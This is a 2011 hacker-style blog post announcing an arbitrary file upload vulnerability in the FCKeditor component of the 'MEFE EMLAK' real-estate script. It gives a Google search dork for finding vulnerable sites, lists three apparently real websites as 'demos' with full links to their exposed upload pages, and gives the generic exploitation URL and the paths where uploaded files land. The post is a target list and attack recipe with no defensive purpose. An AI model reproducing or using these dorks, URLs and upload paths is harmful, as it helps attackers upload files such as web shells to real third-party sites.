Tuesday, 26 July 2011

FCKEditor Vulnerability

Author : KaCaK
HomePage : http://www.griadamlar.com
Web App.Name : MEFE EMLAK SCRIPT
Price : N/A
Version : N/A
Software: http://emlak.mefe.net/
Vulnerability Style : File Upload
Bug : File Upload
Google Keyword : inurl:advert_detail.php?id=

Demos :
http://www.emlax.de/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

http://www.dogoturizm.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

http://www.atlantagrup.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Explotation|(FCKeditor) Artibary File Upload :
http://$Site/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.phpFile Uploaded Link :
http://$site/$path/files
http://$site/files
 
 
 
source: http://www.binushacker.net/fckeditor-vulnerability.html